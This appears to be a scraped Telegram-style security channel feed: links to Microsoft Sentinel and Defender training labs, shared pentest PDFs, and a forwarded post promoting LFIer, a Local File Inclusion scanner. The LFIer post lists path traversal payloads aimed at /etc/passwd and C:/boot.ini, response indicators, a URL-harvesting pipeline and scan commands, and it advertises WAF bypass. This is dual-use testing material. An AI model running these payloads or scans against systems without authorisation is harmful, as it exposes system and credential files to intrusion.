UNDERCODE COMMUNITY

🦑🧪 Interactive Labs for Microsoft Certified: Security Operations Analyst Associate

🔹 Apply Microsoft Defender for Office 365 preset security policies
🧪 https://lnkd.in/d6BqZJtv

🔹 Deploy Microsoft Defender for Endpoint
🧪 https://lnkd.in/dd_Vj9VT

🔹 Mitigate Attacks with Microsoft Defender for Endpoint
🧪 https://lnkd.in/d273kEnd

🔹 Enable Microsoft Defender for Cloud
🧪 https://lnkd.in/d_nGMapG

🔹 Mitigate threats using Microsoft Defender for Cloud
🧪 https://lnkd.in/drJmedgr

🔹 Create queries for Microsoft Sentinel using Kusto Query Language (KQL)
🧪 https://lnkd.in/dQnQ_iEZ

🔹 Configure your Microsoft Sentinel environment
🧪 https://lnkd.in/dr4akkUX

🔹 Connect data to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dtRmAwFa

🔹 Connect Windows devices to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dpxmvabA

🔹 Connect Linux hosts to Microsoft Sentinel using data connectors
🧪 https://lnkd.in/dua8fHNm

🔹 Create workbooks
🧪 https://lnkd.in/dnawKhcP

🔹 Use Repositories in Microsoft Sentinel
🧪 https://lnkd.in/daQkDy9N

Ref: Dimitris Chatzidimitris
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

lnkd.in

This link will take you to a page that’s not on LinkedIn

20 viewsUNDERCODER, 17:30

UNDERCODE COMMUNITY

Forwarded from Exploiting Crew (Pr1vAt3)

17 viewsUNDERCODER, 18:57

UNDERCODE COMMUNITY

Forwarded from Exploiting Crew (Pr1vAt3)

🦑 LFIer Tool :

>>>>LFIer>>>> is a powerful tool for detecting >>>>Local File Inclusion (LFI)>>>> vulnerabilities in web applications. By injecting payloads into URL parameters and analyzing responses, it efficiently identifies potential security issues. The tool is designed for flexibility, efficiency, and accuracy, even when scanning sites protected by WAFs or cloud-based defenses.

🌟 >>>>Key Features>>>>
1. >>>>⚡️ High Performance>>>>: Async programming ensures rapid, non-blocking requests for large-scale scanning.
2. >>>>🔍 Advanced Detection>>>>: Custom payloads and indicators accurately detect vulnerabilities.
3. >>>>🛡 WAF/Cloud Bypass>>>>: Simulates real browser requests to bypass security measures.
4. >>>>💉 Custom Payloads>>>>: Allows user-defined payload injection for flexibility.
5. >>>>🌐 Custom Headers>>>>: Mimics client requests or bypasses filters with custom headers.
6. >>>>⏱️ Rate Limiting>>>>: Prevents server overload by controlling request frequency and batching.
7. >>>>📝 Flexible Output>>>>: Results in JSON or plain text for seamless integration into pipelines.
8. >>>>🔧 Configurability>>>>: Adjustable settings for rate, timeouts, and workers.
9. >>>>📂 Organized Scans>>>>: Groups results by domain or URL list.
10. >>>>🔄 Easy Updates>>>>: One-click update mechanism ensures the latest features.

📥 >>>>Installation>>>>

# >>>>For Kali Linux (2024.4+)>>>>

git clone https://github.com/Cybersecurity-Ethical-Hacker/lfier.git
cd lfier
pipx install aiohttp 
pipx install colorama
pipx install tqdm

# >>>>Using Virtual Environment (Recommended for Non-Kali Users)>>>>
1. >>>>Create and activate virtual environment:>>>>

   python3 -m venv venv
   source venv/bin/activate

2. >>>>Upgrade pip:>>>>

   pip install --upgrade pip

3. >>>>Clone the repository and install dependencies:>>>>

   git clone https://github.com/Cybersecurity-Ethical-Hacker/lfier.git
   cd lfier
   pip install -r requirements.txt

---

📄 >>>>Payloads & Indicators>>>>

# >>>>Linux Example>>>>
- >>>>Payloads>>>>:


  /..\\../..\\../etc/passwd
  ../../../../../etc/passwd

- >>>>Indicators>>>>:


  root:x:0:0:
  nobody:x:65534:

# >>>>Windows Example>>>>
- >>>>Payloads>>>>:


  C:/boot.ini

- >>>>Indicators>>>>:


  [boot loader]
  timeout=30

---

🧩 >>>>Parameterized URLs>>>>
To find URLs with parameters:

paramspider -d domain.com -s 2>&1 | grep -Ei "https?://" | sort -u | httpx -silent -status-code -mc 200,201,204,401,403 > live_urls.txt

---

🚀 >>>>Usage Examples>>>>

# >>>>Single Domain Scan>>>>

python lfier.py -d "https://domain.com/file.php?parameter=1234"

# >>>>Multiple URLs with Custom Rate>>>>

python lfier.py -l urls.txt -r 5

# >>>>Advanced Usage>>>>
- Custom headers:

  python lfier.py -d "https://example.com" -H "User-Agent: CustomAgent"

- JSON output:

  python lfier.py -l urls.txt -j -o results.json

---

❗️ >>>>Important Notes>>>>
- Always activate the virtual environment before using LFIer:

  source venv/bin/activate

- Regularly update LFIer to keep it effective against new protections:

  python lfier.py -u

This tool is a must-have for cybersecurity professionals looking to identify and remediate LFI vulnerabilities efficiently. Happy hunting!

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

23 viewsUNDERCODER, 18:57

UNDERCODE COMMUNITY

Dns for Beginers.pdf

679.3 KB

17 viewsUNDERCODER, 18:59

UNDERCODE COMMUNITY

Forwarded from UNDERCODE TESTING

WEB APPLICATION PENETRATION TESTING.pdf

13.1 MB

16 viewsUNDERCODER, 19:02

UNDERCODE COMMUNITY

Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)